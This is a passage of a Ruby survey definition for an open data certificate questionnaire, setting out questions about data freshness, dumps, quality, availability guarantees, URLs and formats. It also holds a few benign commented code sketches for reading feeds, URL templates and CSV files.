:custom_renderer => '/partials/fieldset'
q_serviceType 'Does the data behind your API change?',
:discussion_topic => :serviceType,
:display_on_certificate => true,
:text_as_statement => 'The data behind the API',
:pick => :one,
:required => :pilot
dependency :rule => 'A'
condition_A :q_releaseType, '==', :a_service
a_static 'no, the API gives access to unchanging data',
:text_as_statement => 'will not change',
:help_text => 'Some APIs just make accessing an unchanging dataset easier, particularly when there\'s lots of it.'
a_changing 'yes, the API gives access to changing data',
:text_as_statement => 'will change',
:help_text => 'Some APIs give instant access to more up-to-date and ever-changing data.'
q_timeSensitive 'Will your data go out of date?',
:discussion_topic => :timeSensitive,
:display_on_certificate => true,
:text_as_statement => 'The accuracy or relevance of this data will',
:pick => :one
dependency :rule => '(A or B or (C and D))'
condition_A :q_releaseType, '==', :a_oneoff
condition_B :q_releaseType, '==', :a_collection
condition_C :q_releaseType, '==', :a_service
condition_D :q_serviceType, '==', :a_static
a_true 'yes, this data will go out of date',
:text_as_statement => 'go out of date',
:help_text => 'For example, a dataset of bus stop locations will go out of date over time as some are moved or new ones created.'
a_timestamped 'yes, this data will go out of date over time but it\'s timestamped',
:text_as_statement => 'go out of date but it is timestamped',
:help_text => 'For example, population statistics usually include a fixed timestamp to indicate when the statistics were relevant.',
:requirement => ['pilot_7']
a_false 'no, this data does not contain any time-sensitive information',
:text_as_statement => 'not go out of date',
:help_text => 'For example, the results of an experiment will not go out of date because the data accurately reports observed outcomes.',
:requirement => ['standard_16']
label_pilot_7 'You should <strong>put timestamps in your data when you release it</strong> so people know the period it relates to and when it will expire.',
:custom_renderer => '/partials/requirement_pilot',
:requirement => 'pilot_7'
dependency :rule => '(A or B or (C and D)) and (E and F)'
condition_A :q_releaseType, '==', :a_oneoff
condition_B :q_releaseType, '==', :a_collection
condition_C :q_releaseType, '==', :a_service
condition_D :q_serviceType, '==', :a_static
condition_E :q_timeSensitive, '!=', :a_timestamped
condition_F :q_timeSensitive, '!=', :a_false
label_standard_16 'You should <strong>publish updates to time-sensitive data</strong> so that it does not go stale.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_16'
dependency :rule => '(A or B or (C and D)) and (E)'
condition_A :q_releaseType, '==', :a_oneoff
condition_B :q_releaseType, '==', :a_collection
condition_C :q_releaseType, '==', :a_service
condition_D :q_serviceType, '==', :a_static
condition_E :q_timeSensitive, '!=', :a_false
q_frequentChanges 'Does this data change at least daily?',
:discussion_topic => :frequentChanges,
:display_on_certificate => true,
:text_as_statement => 'This data changes',
:help_text => 'Tell people if the underlying data changes on most days. When data changes frequently it also goes out of date quickly, so people need to know whether you update it frequently and quickly too.',
:pick => :one,
:required => :pilot
dependency :rule => 'A'
condition_A :q_releaseType, '==', :a_series
a_false 'no',
:text_as_statement => ''
a_true 'yes',
:text_as_statement => 'at least daily'
q_seriesType 'What type of dataset series is this?',
:discussion_topic => :seriesType,
:display_on_certificate => true,
:text_as_statement => 'This data is a series of',
:pick => :one,
:required => :exemplar
dependency :rule => 'A and B'
condition_A :q_releaseType, '==', :a_series
condition_B :q_frequentChanges, '==', :a_true
a_dumps 'regular copies of a complete database',
:text_as_statement => 'copies of a database',
:help_text => 'Choose if you publish new and updated copies of your full database regularly. When you create database dumps, it\'s useful for people to have access to a feed of the changes so they can keep their copies up to date.'
a_aggregate 'regular aggregates of changing data',
:text_as_statement => 'aggregates of changing data',
:help_text => 'Choose if you create new datasets regularly. You might do this if the underlying data can\'t be released as open data or if you only publish data that\'s new since the last publication.'
q_changeFeed 'Is a feed of changes available?',
:discussion_topic => :changeFeed,
:display_on_certificate => true,
:text_as_statement => 'A feed of changes to this data',
:help_text => 'Tell people if you provide a stream of changes that affect this data, like new entries or amendments to existing entries. Feeds might be in RSS, Atom or custom formats.',
:pick => :one
dependency :rule => 'A and B and C'
condition_A :q_releaseType, '==', :a_series
condition_B :q_frequentChanges, '==', :a_true
condition_C :q_seriesType, '==', :a_dumps
a_false 'no',
:text_as_statement => ''
a_true 'yes',
:text_as_statement => 'is available',
:requirement => ['exemplar_4']
label_exemplar_4 'You should <strong>provide a feed of changes to your data</strong> so people keep their copies up-to-date and accurate.',
:custom_renderer => '/partials/requirement_exemplar',
:requirement => 'exemplar_4'
dependency :rule => 'A and B and C and D'
condition_A :q_releaseType, '==', :a_series
condition_B :q_frequentChanges, '==', :a_true
condition_C :q_seriesType, '==', :a_dumps
condition_D :q_changeFeed, '==', :a_false
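# A minimal sketch, using Ruby's standard 'rss' and 'open-uri' libraries, of
# how a script could consume a feed of changes like the one described above.
# The feed URL is hypothetical and the feed is assumed to be RSS 2.0.
#
#   require 'rss'
#   require 'open-uri'
#
#   feed = RSS::Parser.parse(URI.open('http://example.com/data/changes.rss'))
#   feed.items.each do |item|
#     # Print each change entry's title and link so a consumer can fetch it.
#     puts "#{item.title}: #{item.link}"
#   end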
q_frequentSeriesPublication 'How often do you create a new release?',
:discussion_topic => :frequentSeriesPublication,
:display_on_certificate => true,
:text_as_statement => 'New releases of this data are made',
:help_text => 'This determines how out of date this data becomes before people can get an update.',
:pick => :one
dependency :rule => 'A and B'
condition_A :q_releaseType, '==', :a_series
condition_B :q_frequentChanges, '==', :a_true
a_rarely 'less than once a month',
:text_as_statement => 'less than once a month'
a_monthly 'at least every month',
:text_as_statement => 'at least every month',
:requirement => ['pilot_8']
a_weekly 'at least every week',
:text_as_statement => 'at least every week',
:requirement => ['standard_17']
a_daily 'at least every day',
:text_as_statement => 'at least every day',
:requirement => ['exemplar_5']
label_pilot_8 'You should <strong>create a new dataset release every month</strong> so people keep their copies up-to-date and accurate.',
:custom_renderer => '/partials/requirement_pilot',
:requirement => 'pilot_8'
dependency :rule => 'A and B and (C and D and E)'
condition_A :q_releaseType, '==', :a_series
condition_B :q_frequentChanges, '==', :a_true
condition_C :q_frequentSeriesPublication, '!=', :a_monthly
condition_D :q_frequentSeriesPublication, '!=', :a_weekly
condition_E :q_frequentSeriesPublication, '!=', :a_daily
label_standard_17 'You should <strong>create a new dataset release every week</strong> so people keep their copies up-to-date and accurate.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_17'
dependency :rule => 'A and B and (C and D)'
condition_A :q_releaseType, '==', :a_series
condition_B :q_frequentChanges, '==', :a_true
condition_C :q_frequentSeriesPublication, '!=', :a_weekly
condition_D :q_frequentSeriesPublication, '!=', :a_daily
label_exemplar_5 'You should <strong>create a new dataset release every day</strong> so people keep their copies up-to-date and accurate.',
:custom_renderer => '/partials/requirement_exemplar',
:requirement => 'exemplar_5'
dependency :rule => 'A and B and (C)'
condition_A :q_releaseType, '==', :a_series
condition_B :q_frequentChanges, '==', :a_true
condition_C :q_frequentSeriesPublication, '!=', :a_daily
q_seriesPublicationDelay 'How long is the delay between when you create a dataset and when you publish it?',
:discussion_topic => :seriesPublicationDelay,
:display_on_certificate => true,
:text_as_statement => 'The lag between creation and publication of this data is',
:pick => :one
dependency :rule => 'A'
condition_A :q_releaseType, '==', :a_series
a_extreme 'longer than the gap between releases',
:text_as_statement => 'longer than the gap between releases',
:help_text => 'For example, if you create a new version of the dataset every day, choose this if it takes more than a day for it to be published.'
a_reasonable 'about the same as the gap between releases',
:text_as_statement => 'about the same as the gap between releases',
:help_text => 'For example, if you create a new version of the dataset every day, choose this if it takes about a day for it to be published.',
:requirement => ['pilot_9']
a_good 'less than half the gap between releases',
:text_as_statement => 'less than half the gap between releases',
:help_text => 'For example, if you create a new version of the dataset every day, choose this if it takes less than twelve hours for it to be published.',
:requirement => ['standard_18']
a_minimal 'there is minimal or no delay',
:text_as_statement => 'minimal',
:help_text => 'Choose this if you publish within a few seconds or a few minutes.',
:requirement => ['exemplar_6']
label_pilot_9 'You should <strong>have a reasonable delay between when you create and publish a dataset</strong> that is less than the gap between releases so people keep their copies up-to-date and accurate.',
:custom_renderer => '/partials/requirement_pilot',
:requirement => 'pilot_9'
dependency :rule => 'A and (B and C and D)'
condition_A :q_releaseType, '==', :a_series
condition_B :q_seriesPublicationDelay, '!=', :a_reasonable
condition_C :q_seriesPublicationDelay, '!=', :a_good
condition_D :q_seriesPublicationDelay, '!=', :a_minimal
label_standard_18 'You should <strong>have a short delay between when you create and publish a dataset</strong> that is less than half the gap between releases so people keep their copies up-to-date and accurate.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_18'
dependency :rule => 'A and (B and C)'
condition_A :q_releaseType, '==', :a_series
condition_B :q_seriesPublicationDelay, '!=', :a_good
condition_C :q_seriesPublicationDelay, '!=', :a_minimal
label_exemplar_6 'You should <strong>have minimal or no delay between when you create and publish a dataset</strong> so people keep their copies up-to-date and accurate.',
:custom_renderer => '/partials/requirement_exemplar',
:requirement => 'exemplar_6'
dependency :rule => 'A and (B)'
condition_A :q_releaseType, '==', :a_series
condition_B :q_seriesPublicationDelay, '!=', :a_minimal
q_provideDumps 'Do you also publish dumps of this dataset?',
:discussion_topic => :provideDumps,
:display_on_certificate => true,
:text_as_statement => 'The curator publishes',
:help_text => 'A dump is an extract of the whole dataset into a file that people can download. This lets people do analysis that\'s different to analysis with API access.',
:pick => :one
dependency :rule => 'A'
condition_A :q_releaseType, '==', :a_service
a_false 'no',
:text_as_statement => ''
a_true 'yes',
:text_as_statement => 'dumps of the data',
:requirement => ['standard_19']
label_standard_19 'You should <strong>let people download your entire dataset</strong> so that they can do more complete and accurate analysis with all the data.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_19'
dependency :rule => 'A and B'
condition_A :q_releaseType, '==', :a_service
condition_B :q_provideDumps, '==', :a_false
q_dumpFrequency 'How frequently do you create a new database dump?',
:discussion_topic => :dumpFrequency,
:display_on_certificate => true,
:text_as_statement => 'Database dumps are created',
:help_text => 'Faster access to more frequent extracts of the whole dataset means people can get started quicker with the most up-to-date data.',
:pick => :one
dependency :rule => 'A and B and C'
condition_A :q_releaseType, '==', :a_service
condition_B :q_serviceType, '==', :a_changing
condition_C :q_provideDumps, '==', :a_true
a_rarely 'less frequently than once a month',
:text_as_statement => 'less frequently than once a month'
a_monthly 'at least every month',
:text_as_statement => 'at least every month',
:requirement => ['pilot_10']
a_weekly 'within a week of any change',
:text_as_statement => 'within a week of any change',
:requirement => ['standard_20']
a_daily 'within a day of any change',
:text_as_statement => 'within a day of any change',
:requirement => ['exemplar_7']
label_pilot_10 'You should <strong>create a new database dump every month</strong> so that people have the latest data.',
:custom_renderer => '/partials/requirement_pilot',
:requirement => 'pilot_10'
dependency :rule => 'A and B and C and (D and E and F)'
condition_A :q_releaseType, '==', :a_service
condition_B :q_serviceType, '==', :a_changing
condition_C :q_provideDumps, '==', :a_true
condition_D :q_dumpFrequency, '!=', :a_monthly
condition_E :q_dumpFrequency, '!=', :a_weekly
condition_F :q_dumpFrequency, '!=', :a_daily
label_standard_20 'You should <strong>create a new database dump within a week of any change</strong> so that people have less time to wait for the latest data.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_20'
dependency :rule => 'A and B and C and (D and E)'
condition_A :q_releaseType, '==', :a_service
condition_B :q_serviceType, '==', :a_changing
condition_C :q_provideDumps, '==', :a_true
condition_D :q_dumpFrequency, '!=', :a_weekly
condition_E :q_dumpFrequency, '!=', :a_daily
label_exemplar_7 'You should <strong>create a new database dump within a day of any change</strong> so that people find it easier to get the latest data.',
:custom_renderer => '/partials/requirement_exemplar',
:requirement => 'exemplar_7'
dependency :rule => 'A and B and C and (D)'
condition_A :q_releaseType, '==', :a_service
condition_B :q_serviceType, '==', :a_changing
condition_C :q_provideDumps, '==', :a_true
condition_D :q_dumpFrequency, '!=', :a_daily
q_corrected 'Will your data be corrected if it has errors?',
:discussion_topic => :corrected,
:display_on_certificate => true,
:text_as_statement => 'Any errors in this data are',
:help_text => 'It\'s good practice to fix errors in your data especially if you use it yourself. When you make corrections, people need to be told about them.',
:pick => :one
dependency :rule => 'A and B'
condition_A :q_releaseType, '==', :a_service
condition_B :q_timeSensitive, '!=', :a_true
a_false 'no',
:text_as_statement => ''
a_true 'yes',
:text_as_statement => 'corrected',
:requirement => ['standard_21']
label_standard_21 'You should <strong>correct data when people report errors</strong> so everyone benefits from improvements in accuracy.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_21'
dependency :rule => 'A and B and C'
condition_A :q_releaseType, '==', :a_service
condition_B :q_timeSensitive, '!=', :a_true
condition_C :q_corrected, '==', :a_false
label_group_8 'Quality',
:help_text => 'how much people can rely on your data',
:custom_renderer => '/partials/fieldset'
q_qualityUrl 'Where do you document issues with the quality of this data?',
:discussion_topic => :qualityUrl,
:display_on_certificate => true,
:text_as_statement => 'Data quality is documented at',
:help_text => 'Give a URL where people can find out about the quality of your data. People accept that errors are inevitable, from equipment malfunctions or mistakes that happen in system migrations. You should be open about quality so people can judge how much to rely on this data.'
a_1 'Data Quality Documentation URL',
:string,
:input_type => :url,
:placeholder => 'Data Quality Documentation URL',
:requirement => ['standard_22']
label_standard_22 'You should <strong>document any known issues with your data quality</strong> so that people can decide how much to trust your data.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_22'
dependency :rule => 'A'
condition_A :q_qualityUrl, '==', {:string_value => '', :answer_reference => '1'}
q_qualityControlUrl 'Where is your quality control process described?',
:discussion_topic => :qualityControlUrl,
:display_on_certificate => true,
:text_as_statement => 'Quality control processes are described at',
:help_text => 'Give a URL for people to learn about ongoing checks on your data, either automatic or manual. This reassures them that you take quality seriously and encourages improvements that benefit everyone.'
a_1 'Quality Control Process Description URL',
:string,
:input_type => :url,
:placeholder => 'Quality Control Process Description URL',
:requirement => ['exemplar_8']
label_exemplar_8 'You should <strong>document your quality control process</strong> so that people can decide how much to trust your data.',
:custom_renderer => '/partials/requirement_exemplar',
:requirement => 'exemplar_8'
dependency :rule => 'A'
condition_A :q_qualityControlUrl, '==', {:string_value => '', :answer_reference => '1'}
label_group_9 'Guarantees',
:help_text => 'how much people can depend on your data’s availability',
:custom_renderer => '/partials/fieldset'
q_backups 'Do you take offsite backups?',
:discussion_topic => :backups,
:display_on_certificate => true,
:text_as_statement => 'The data is',
:help_text => 'Taking a regular offsite backup helps ensure that the data won\'t be lost in the case of an accident.',
:pick => :one
a_false 'no',
:text_as_statement => ''
a_true 'yes',
:text_as_statement => 'backed up offsite',
:requirement => ['standard_23']
label_standard_23 'You should <strong>take a regular offsite backup</strong> so that the data won\'t be lost if an accident happens.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_23'
dependency :rule => 'A'
condition_A :q_backups, '==', :a_false
q_slaUrl 'Where do you describe any guarantees about service availability?',
:discussion_topic => :slaUrl,
:display_on_certificate => true,
:text_as_statement => 'Service availability is described at',
:help_text => 'Give a URL for a page that describes what guarantees you have about your service being available for people to use. For example you might have a guaranteed uptime of 99.5%, or you might provide no guarantees.'
dependency :rule => 'A'
condition_A :q_releaseType, '==', :a_service
a_1 'Service Availability Documentation URL',
:string,
:input_type => :url,
:placeholder => 'Service Availability Documentation URL',
:requirement => ['standard_24']
label_standard_24 'You should <strong>describe what guarantees you have around service availability</strong> so that people know how much they can rely on it.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_24'
dependency :rule => 'A and B'
condition_A :q_releaseType, '==', :a_service
condition_B :q_slaUrl, '==', {:string_value => '', :answer_reference => '1'}
q_statusUrl 'Where do you give information about the current status of the service?',
:discussion_topic => :statusUrl,
:display_on_certificate => true,
:text_as_statement => 'Service status is given at',
:help_text => 'Give a URL for a page that tells people about the current status of your service, including any faults you are aware of.'
dependency :rule => 'A'
condition_A :q_releaseType, '==', :a_service
a_1 'Service Status URL',
:string,
:input_type => :url,
:placeholder => 'Service Status URL',
:requirement => ['exemplar_9']
label_exemplar_9 'You should <strong>have a service status page</strong> that tells people about the current status of your service.',
:custom_renderer => '/partials/requirement_exemplar',
:requirement => 'exemplar_9'
dependency :rule => 'A and B'
condition_A :q_releaseType, '==', :a_service
condition_B :q_statusUrl, '==', {:string_value => '', :answer_reference => '1'}
q_onGoingAvailability 'How long will this data be available for?',
:discussion_topic => :onGoingAvailability,
:display_on_certificate => true,
:text_as_statement => 'The data is available',
:pick => :one
a_experimental 'it might disappear at any time',
:text_as_statement => 'experimentally and might disappear at any time'
a_short 'it\'s available experimentally but should be around for another year or so',
:text_as_statement => 'experimentally for another year or so',
:requirement => ['pilot_11']
a_medium 'it\'s in your medium-term plans so should be around for a couple of years',
:text_as_statement => 'for at least a couple of years',
:requirement => ['standard_25']
a_long 'it\'s part of your day-to-day operations so will stay published for a long time',
:text_as_statement => 'for a long time',
:requirement => ['exemplar_10']
label_pilot_11 'You should <strong>guarantee that your data will be available in this form for at least a year</strong> so that people can decide how much to rely on your data.',
:custom_renderer => '/partials/requirement_pilot',
:requirement => 'pilot_11'
dependency :rule => 'A and B and C'
condition_A :q_onGoingAvailability, '!=', :a_short
condition_B :q_onGoingAvailability, '!=', :a_medium
condition_C :q_onGoingAvailability, '!=', :a_long
label_standard_25 'You should <strong>guarantee that your data will be available in this form in the medium-term</strong> so that people can decide how much to trust your data.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_25'
dependency :rule => 'A and B'
condition_A :q_onGoingAvailability, '!=', :a_medium
condition_B :q_onGoingAvailability, '!=', :a_long
label_exemplar_10 'You should <strong>guarantee that your data will be available in this form in the long-term</strong> so that people can decide how much to trust your data.',
:custom_renderer => '/partials/requirement_exemplar',
:requirement => 'exemplar_10'
dependency :rule => 'A'
condition_A :q_onGoingAvailability, '!=', :a_long
end
section_technical 'Technical Information',
:description => 'Locations, formats and trust' do
label_group_11 'Locations',
:help_text => 'how people can access your data',
:custom_renderer => '/partials/fieldset'
q_datasetUrl 'Where is your dataset?',
:discussion_topic => :datasetUrl,
:display_on_certificate => true,
:text_as_statement => 'This data is published at',
:help_text => 'Give a URL to the dataset itself. Open data should be linked to directly on the web so people can easily find and reuse it.'
dependency :rule => 'A'
condition_A :q_releaseType, '==', :a_oneoff
a_1 'Dataset URL',
:string,
:input_type => :url,
:placeholder => 'Dataset URL',
:requirement => ['basic_9', 'pilot_12']
label_basic_9 'You must <strong>provide either a URL to your data or a URL to documentation</strong> about it so that people can find it.',
:custom_renderer => '/partials/requirement_basic',
:requirement => 'basic_9'
dependency :rule => 'A and B and C'
condition_A :q_releaseType, '==', :a_oneoff
condition_B :q_documentationUrl, '==', {:string_value => '', :answer_reference => '1'}
condition_C :q_datasetUrl, '==', {:string_value => '', :answer_reference => '1'}
label_pilot_12 'You should <strong>have a URL that is a direct link to the data itself</strong> so that people can access it easily.',
:custom_renderer => '/partials/requirement_pilot',
:requirement => 'pilot_12'
dependency :rule => 'A and B and C'
condition_A :q_releaseType, '==', :a_oneoff
condition_B :q_documentationUrl, '!=', {:string_value => '', :answer_reference => '1'}
condition_C :q_datasetUrl, '==', {:string_value => '', :answer_reference => '1'}
q_versionManagement 'How do you publish a series of the same dataset?',
:discussion_topic => :versionManagement,
:requirement => ['basic_10'],
:pick => :any
dependency :rule => 'A'
condition_A :q_releaseType, '==', :a_series
a_current 'as a single URL that\'s regularly updated',
:help_text => 'Choose this if there\'s one URL for people to download the most recent version of the current dataset.',
:requirement => ['standard_26']
a_template 'as consistent URLs for each release',
:help_text => 'Choose this if your dataset URLs follow a regular pattern that includes the date of publication, for example, a URL that starts \'2013-04\'. This helps people to understand how often you release data, and to write scripts that fetch new ones each time they\'re released.',
:requirement => ['pilot_13']
a_list 'as a list of releases',
:help_text => 'Choose this if you have a list of datasets on a web page or a feed (like Atom or RSS) with links to each individual release and its details. This helps people to understand how often you release data, and to write scripts that fetch new ones each time they\'re released.',
:requirement => ['standard_27']
label_standard_26 'You should <strong>have a single persistent URL to download the current version of your data</strong> so that people can access it easily.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_26'
dependency :rule => 'A and B'
condition_A :q_releaseType, '==', :a_series
condition_B :q_versionManagement, '!=', :a_current
label_pilot_13 'You should <strong>use a consistent pattern for different release URLs</strong> so that people can download each one automatically.',
:custom_renderer => '/partials/requirement_pilot',
:requirement => 'pilot_13'
dependency :rule => 'A and B'
condition_A :q_releaseType, '==', :a_series
condition_B :q_versionManagement, '!=', :a_template
label_standard_27 'You should <strong>have a document or feed with a list of available releases</strong> so people can create scripts to download them all.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_27'
dependency :rule => 'A and B'
condition_A :q_releaseType, '==', :a_series
condition_B :q_versionManagement, '!=', :a_list
label_basic_10 'You must <strong>provide access to releases of your data through a URL</strong> that gives the current version, a discoverable series of URLs or through a documentation page so that people can find it.',
:custom_renderer => '/partials/requirement_basic',
:requirement => 'basic_10'
dependency :rule => 'A and (B and C and D and E)'
condition_A :q_releaseType, '==', :a_series
condition_B :q_documentationUrl, '==', {:string_value => '', :answer_reference => '1'}
condition_C :q_versionManagement, '!=', :a_current
condition_D :q_versionManagement, '!=', :a_template
condition_E :q_versionManagement, '!=', :a_list
q_currentDatasetUrl 'Where is your current dataset?',
:discussion_topic => :currentDatasetUrl,
:display_on_certificate => true,
:text_as_statement => 'The current dataset is available at',
:help_text => 'Give a single URL to the most recent version of the dataset. The content at this URL should change each time a new version is released.',
:required => :required
dependency :rule => 'A and B'
condition_A :q_releaseType, '==', :a_series
condition_B :q_versionManagement, '==', :a_current
a_1 'Current Dataset URL',
:string,
:input_type => :url,
:placeholder => 'Current Dataset URL',
:required => :required
q_versionsTemplateUrl 'What format do dataset release URLs follow?',
:discussion_topic => :versionsTemplateUrl,
:display_on_certificate => true,
:text_as_statement => 'Releases follow this consistent URL pattern',
:help_text => 'This is the structure of URLs when you publish different releases. Use `{variable}` to indicate parts of the template URL that change, for example, `http://example.com/data/monthly/mydata-{YY}{MM}.csv`',
:required => :required
dependency :rule => 'A and B'
condition_A :q_releaseType, '==', :a_series
condition_B :q_versionManagement, '==', :a_template
a_1 'Version Template URL',
:string,
:input_type => :text,
:placeholder => 'Version Template URL',
:required => :required
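# A minimal sketch of how a consumer might expand a release URL template of
# the kind described above into concrete monthly URLs. The template string
# and the date range are hypothetical examples.
#
#   template = 'http://example.com/data/monthly/mydata-{YY}{MM}.csv'
#   (1..3).each do |month|
#     # Substitute the changing parts of the template for a given month.
#     url = template.sub('{YY}', '13').sub('{MM}', format('%02d', month))
#     puts url  # => http://example.com/data/monthly/mydata-1301.csv, ...
#   end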
q_versionsUrl 'Where is your list of dataset releases?',
:discussion_topic => :versionsUrl,
:display_on_certificate => true,
:text_as_statement => 'Releases of this data are listed at',
:help_text => 'Give a URL to a page or feed with a machine-readable list of datasets. Use the URL of the first page which should link to the rest of the pages.',
:required => :required
dependency :rule => 'A and B'
condition_A :q_releaseType, '==', :a_series
condition_B :q_versionManagement, '==', :a_list
a_1 'Version List URL',
:string,
:input_type => :url,
:placeholder => 'Version List URL',
:required => :required
q_endpointUrl 'Where is the endpoint for your API?',
:discussion_topic => :endpointUrl,
:display_on_certificate => true,
:text_as_statement => 'The API service endpoint is',
:help_text => 'Give a URL that\'s a starting point for people\'s scripts to access your API. This should be a service description document that helps the script to work out which services exist.'
dependency :rule => 'A'
condition_A :q_releaseType, '==', :a_service
a_1 'Endpoint URL',
:string,
:input_type => :url,
:placeholder => 'Endpoint URL',
:requirement => ['basic_11', 'standard_28']
label_basic_11 'You must <strong>provide either an API endpoint URL or a URL to its documentation</strong> so that people can find it.',
:custom_renderer => '/partials/requirement_basic',
:requirement => 'basic_11'
dependency :rule => 'A and B and C'
condition_A :q_releaseType, '==', :a_service
condition_B :q_documentationUrl, '==', {:string_value => '', :answer_reference => '1'}
condition_C :q_endpointUrl, '==', {:string_value => '', :answer_reference => '1'}
label_standard_28 'You should <strong>have a service description document or single entry point for your API</strong> so that people can access it.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_28'
dependency :rule => 'A and B and C'
condition_A :q_releaseType, '==', :a_service
condition_B :q_documentationUrl, '!=', {:string_value => '', :answer_reference => '1'}
condition_C :q_endpointUrl, '==', {:string_value => '', :answer_reference => '1'}
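# A minimal sketch, using Ruby's standard 'net/http' library, of a script
# fetching a service description document from an API endpoint like the one
# asked for above. The endpoint URL is hypothetical.
#
#   require 'net/http'
#   require 'uri'
#
#   endpoint = URI('http://example.com/api/')
#   response = Net::HTTP.get_response(endpoint)
#   # The body is expected to describe which services exist, e.g. as JSON.
#   puts response.body if response.is_a?(Net::HTTPSuccess)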
q_dumpManagement 'How do you publish database dumps?',
:discussion_topic => :dumpManagement,
:pick => :any
dependency :rule => 'A and B'
condition_A :q_releaseType, '==', :a_service
condition_B :q_provideDumps, '==', :a_true
a_current 'as a single URL that\'s regularly updated',
:help_text => 'Choose this if there\'s one URL for people to download the most recent version of the current database dump.',
:requirement => ['standard_29']
a_template 'as consistent URLs for each release',
:help_text => 'Choose this if your database dump URLs follow a regular pattern that includes the date of publication, for example, a URL that starts \'2013-04\'. This helps people to understand how often you release data, and to write scripts that fetch new ones each time they\'re released.',
:requirement => ['exemplar_11']
a_list 'as a list of releases',
:help_text => 'Choose this if you have a list of database dumps on a web page or a feed (such as Atom or RSS) with links to each individual release and its details. This helps people to understand how often you release data, and to write scripts that fetch new ones each time they\'re released.',
:requirement => ['exemplar_12']
label_standard_29 'You should <strong>have a single persistent URL to download the current dump of your database</strong> so that people can find it.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_29'
dependency :rule => 'A and B and C'
condition_A :q_releaseType, '==', :a_service
condition_B :q_provideDumps, '==', :a_true
condition_C :q_dumpManagement, '!=', :a_current
label_exemplar_11 'You should <strong>use a consistent pattern for database dump URLs</strong> so that people can download each one automatically.',
:custom_renderer => '/partials/requirement_exemplar',
:requirement => 'exemplar_11'
dependency :rule => 'A and B and C'
condition_A :q_releaseType, '==', :a_service
condition_B :q_provideDumps, '==', :a_true
condition_C :q_dumpManagement, '!=', :a_template
label_exemplar_12 'You should <strong>have a document or feed with a list of available database dumps</strong> so people can create scripts to download them all.',
:custom_renderer => '/partials/requirement_exemplar',
:requirement => 'exemplar_12'
dependency :rule => 'A and B and C'
condition_A :q_releaseType, '==', :a_service
condition_B :q_provideDumps, '==', :a_true
condition_C :q_dumpManagement, '!=', :a_list
q_currentDumpUrl 'Where is the current database dump?',
:discussion_topic => :currentDumpUrl,
:display_on_certificate => true,
:text_as_statement => 'The most recent database dump is always available at',
:help_text => 'Give a URL to the most recent dump of the database. The content at this URL should change each time a new database dump is created.',
:required => :required
dependency :rule => 'A and B and C'
condition_A :q_releaseType, '==', :a_service
condition_B :q_provideDumps, '==', :a_true
condition_C :q_dumpManagement, '==', :a_current
a_1 'Current Dump URL',
:string,
:input_type => :url,
:placeholder => 'Current Dump URL',
:required => :required
q_dumpsTemplateUrl 'What format do database dump URLs follow?',
:discussion_topic => :dumpsTemplateUrl,
:display_on_certificate => true,
:text_as_statement => 'Database dumps follow the consistent URL pattern',
:help_text => 'This is the structure of URLs when you publish different releases. Use `{variable}` to indicate parts of the template URL that change, for example, `http://example.com/data/monthly/mydata-{YY}{MM}.csv`',
:required => :required
dependency :rule => 'A and B and C'
condition_A :q_releaseType, '==', :a_service
condition_B :q_provideDumps, '==', :a_true
condition_C :q_dumpManagement, '==', :a_template
a_1 'Dump Template URL',
:string,
:input_type => :text,
:placeholder => 'Dump Template URL',
:required => :required
q_dumpsUrl 'Where is your list of available database dumps?',
:discussion_topic => :dumpsUrl,
:display_on_certificate => true,
:text_as_statement => 'A list of database dumps is at',
:help_text => 'Give a URL to a page or feed with a machine-readable list of database dumps. Use the URL of the first page which should link to the rest of the pages.',
:required => :required
dependency :rule => 'A and B and C'
condition_A :q_releaseType, '==', :a_service
condition_B :q_provideDumps, '==', :a_true
condition_C :q_dumpManagement, '==', :a_list
a_1 'Dump List URL',
:string,
:input_type => :url,
:placeholder => 'Dump List URL',
:required => :required
q_changeFeedUrl 'Where is your feed of changes?',
:discussion_topic => :changeFeedUrl,
:display_on_certificate => true,
:text_as_statement => 'A feed of changes to this data is at',
:help_text => 'Give a URL to a page or feed that provides a machine-readable list of the previous versions of the database dumps. Use the URL of the first page which should link to the rest of the pages.',
:required => :required
dependency :rule => 'A'
condition_A :q_changeFeed, '==', :a_true
a_1 'Change Feed URL',
:string,
:input_type => :url,
:placeholder => 'Change Feed URL',
:required => :required
label_group_12 'Formats',
:help_text => 'how people can work with your data',
:custom_renderer => '/partials/fieldset'
q_machineReadable 'Is this data machine-readable?',
:discussion_topic => :machineReadable,
:display_on_certificate => true,
:text_as_statement => 'This data is',
:help_text => 'People prefer data formats which are easily processed by a computer, for speed and accuracy. For example, a scanned photocopy of a spreadsheet would not be machine-readable but a CSV file would be.',
:pick => :one
a_false 'no',
:text_as_statement => ''
a_true 'yes',
:text_as_statement => 'machine-readable',
:requirement => ['pilot_14']
label_pilot_14 'You should <strong>provide your data in a machine-readable format</strong> so that it\'s easy to process.',
:custom_renderer => '/partials/requirement_pilot',
:requirement => 'pilot_14'
dependency :rule => 'A'
condition_A :q_machineReadable, '==', :a_false
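# A minimal sketch, using Ruby's standard 'csv' library, of why
# machine-readable formats matter: a CSV file can be processed directly,
# whereas a scanned photocopy cannot. The file name and column are
# hypothetical.
#
#   require 'csv'
#
#   CSV.foreach('bus_stops.csv', headers: true) do |row|
#     puts row['stop_name']
#   end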
q_openStandard 'Is this data in a standard open format?',
:discussion_topic => :openStandard,
:display_on_certificate => true,
:text_as_statement => 'The format of this data is',
:help_text => 'Open standards are created through a fair, transparent and collaborative process. Anyone can implement them and there’s lots of support so it’s easier for you to share data with more people. For example, XML, CSV and JSON are open standards.',
:help_text_more_url => 'https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/183962/Open-Standards-Principles-FINAL.pdf',
:pick => :one
a_false 'no',
:text_as_statement => ''
a_true 'yes',
:text_as_statement => 'a standard open format',
:requirement => ['standard_30']
